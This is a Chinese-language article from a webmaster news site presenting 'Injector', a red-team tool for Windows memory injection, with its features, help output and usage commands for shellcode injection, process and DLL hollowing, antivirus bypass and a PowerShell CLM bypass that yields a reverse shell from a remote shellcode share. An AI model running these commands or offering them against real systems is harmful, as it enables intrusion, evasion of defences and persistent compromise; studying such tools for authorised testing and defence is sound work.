加入收藏 | 设为首页 | 会员中心 | 我要投稿 莆田站长网 (https://www.0594zz.com.cn/)- 业务安全、应用安全、终端安全、数据分析、数据应用!
当前位置: 首页 > 服务器 > 安全 > 正文

怎么使用Injector实现Windows下的内存注入

发布时间:2021-10-01 14:05:09 所属栏目:安全 来源:互联网
导读:关于Injector Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。 Injector能做什么? 针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成
关于Injector
Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。
 
Injector能做什么?
针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程,它将会创建一个记事本进程,并注入其中实现持久化感染。
 
支持反射DLL注入,工具将下载DLL并注入远程进程。
通过exe实现进程镂空。
使用-bypass参数,以支持使用更高级的、未记录的API来进行进程注入。
支持加密的Shellcode,比如说AES加密或异或加密等。
支持针对PowerShell的CLM绕过,可以直接将代码存防止能够执行C#代码的白名单文件夹中,比如说“C:WindowsTasks”。
支持DLL镂空,通过dll实现。
工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地:
 
git clone https://github.com/0xDivyanshu/Injector.git 
工具帮助
C:Usersadmin>Injector.exe 
 
Help Options for Xenon: 
 
-m       Mode of operation 
 
        -m 1     Specifies the mode as Process injection 
 
        -m 2     Specifies the mode as Reflective DLL Injection 
 
        -m 3     Specifies the mode as Process Hollowing 
 
        -m 4     No injection! Give me my damn shell 
 
        -m 5     Powershell session via CLM bypass 
 
        -m 6     DLL hollowing 
 
  
 
-TempFile        File location that your current user can read 
 
-shellcode       Use shellcode 
 
-dll     Use dll 
 
-decrypt-xor     Specify Xor decryption for shellcode 
 
         -pass   Specifty the password for Xor decryption 
 
-decrypt-aes     Specify aes decryption for shellcode 
 
         -pass   Specifty the password for aes decryption 
 
-location        Specify the location i.e either server or local 
 
-bypass         Uses enhance attempts to bypass AV 
如需生成加密的Shellcode,请在Kali下使用Helper.exe。
 
工具使用样例
Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="192.x.x.xshareshellcode.txt" -bypass 
上述命令将解密你的Shellcode并给你一个反向Shell。
 
如果你不想使用加密的Shellcode,你也可以直接使用下列命令运行下列命令:
 
Injector.exe -m=1 -shellcode -location="192.x.x.xshareshellcode.txt" 
将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:
 
Injector.exe -m=5 -TempFile=C:Usersusersample.txt 
上述命令将提供要给会话,我们可以使用它来执行IEX cradle,并获取一个能够绕过CLM的反向Shell。
 
PowerShell
你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:
 
Invoke-Exe -loc C:Usersjohninjector.exe 
项目地址
Injector:【GitHub传送门】

(编辑:莆田站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    热点阅读